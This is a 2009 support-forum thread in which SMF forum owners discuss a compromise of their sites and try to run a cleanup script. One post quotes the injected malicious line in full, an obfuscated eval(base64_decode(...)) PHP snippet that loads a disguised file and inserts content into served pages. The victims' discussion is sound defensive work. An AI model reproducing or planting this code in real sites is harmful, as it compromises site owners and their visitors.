Is this a hack?

busterone · May 07, 2009, 10:49:19 PM

I had 4 of them from the same IP range, but not the krisbarteo character. I was lucky, no hack and no damage.

thatguy · June 10, 2009, 01:08:33 PM

I had another site (not SMF) completely destroyed by this exploit. Although all my SMF PHP pages have that line of code in them I am hoping a clean up script I was pointed to will remove all the malicious code. I'll find out I suppose. The forum still works though.

Code Select

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS93YXN0aW4yL3B1YmxpY19odG1sL2UxMDd2NjE2L2UxMDdfaGFuZGxlcnMvdGlueV9tY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9fdnRpX2NuZi9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvd2FzdGluMi9wdWJsaWNfaHRtbC9lMTA3djYxNi9lMTA3X2hhbmRsZXJzL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9pbWFnZXMveHAvX3Z0aV9jbmYvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> <?php

Very frustrating to see 5 years of fun down the tubes because of a unknown spammer. 5 minutes in alone with the dude is all I am asking for.

ccondrup · June 10, 2009, 01:29:43 PM

I'd like to add that once I got rid of this entirely (I went the manual route) loading my forum (hosted in Norway for Norwegians) pages went from ~2-3 seconds to 0.1-0.5 sec.. it was immediately noticeable.

thatguy · June 10, 2009, 01:43:02 PM

Quote from: ccondrup on June 10, 2009, 01:29:43 PM
I'd like to add that once I got rid of this entirely (I went the manual route) loading my forum (hosted in Norway for Norwegians) pages went from ~2-3 seconds to 0.1-0.5 sec.. it was immediately noticeable.

I am very glad it worked for you. I am in the process of changing all my passwords but if this hack goes as deep as I think it does and as deep as mentioned here then changing passwords before the site is deterged is useless.

Fustrate · June 11, 2009, 01:54:30 PM

Have you tried the cleanup tool?

http://www.simplemachines.org/community/index.php?topic=313201.0

thatguy · June 11, 2009, 01:59:07 PM

I sure did. Followed the directions to a "T". However it wouldn't run, it kept saying it needed to be in the folder where SSI was. Thing is, it was. They where right next to each other, like peas and carrots. I'll take a screen shot tonight when I get home and show you.

Thanks

Fustrate · June 11, 2009, 02:05:58 PM

Try changing the path at the top of the file to the relative path... something like /home/thatguy/public_html/forum/SSI.php and see if that works. If you're not sure, look in Settings.php and see what path $sourcedir uses, and just modify that.

thatguy · June 11, 2009, 02:08:27 PM

OK, I'll do that. I really want it to run. Even though I changed all my passwords I don't like having that viral code in there. They could already know my passwords already.

Thank You

thatguy · June 12, 2009, 04:47:14 PM

Thank you for your patience with me on this, these are the pathes in my settings PHP.

# Note: These directories do not have to be changed unless you move things.
$boarddir = '/home/blood13/public_html/Forums'; # The absolute path to the forum's folder. (not just '.'!)
$sourcedir = '/home/blood13/public_html/Forums/Sources'; # Path to the Sources directory.

I changed the path in kb_scan.php to /home/blood/13/public_html/Forums However, I get this still

Error: Cannot run - please verify you put this in the same place as SMF's index.php and SSI.php files.

Norv · June 12, 2009, 05:24:35 PM

*headscratch*
Certainly look as close as possible to me...
How are the files in this directory chmodded, SSI.php in particular?

Norv · June 12, 2009, 05:25:43 PM

Please eventually, make sure you access your forum, log in as admin, then try to access directly in the browser kb_scan.php.

thatguy · June 12, 2009, 05:34:01 PM

First of all, thanks for your reply. I'll try that.

thatguy · June 12, 2009, 05:55:37 PM

Quote from: Norv on June 12, 2009, 05:24:35 PM
*headscratch*
Certainly look as close as possible to me...
How are the files in this directory chmodded, SSI.php in particular?

SSI is 755
kb_scan.php is 644

Is that right?

thatguy · June 12, 2009, 07:16:30 PM

Thank you all for the tips. I had another site that was completely wiped out by this exploit however, I wasn't using SMF. That site was not worth cleaning, to much damage. The site i was concerned most with was my forum for veterans. I couldn't get this cleaning script to work so I went in manually and deterged every page manually. 5 years ago something similar happened with another forum of mine and the entire site was lost, thankfully that was not the case this time.

News:

Is this a hack?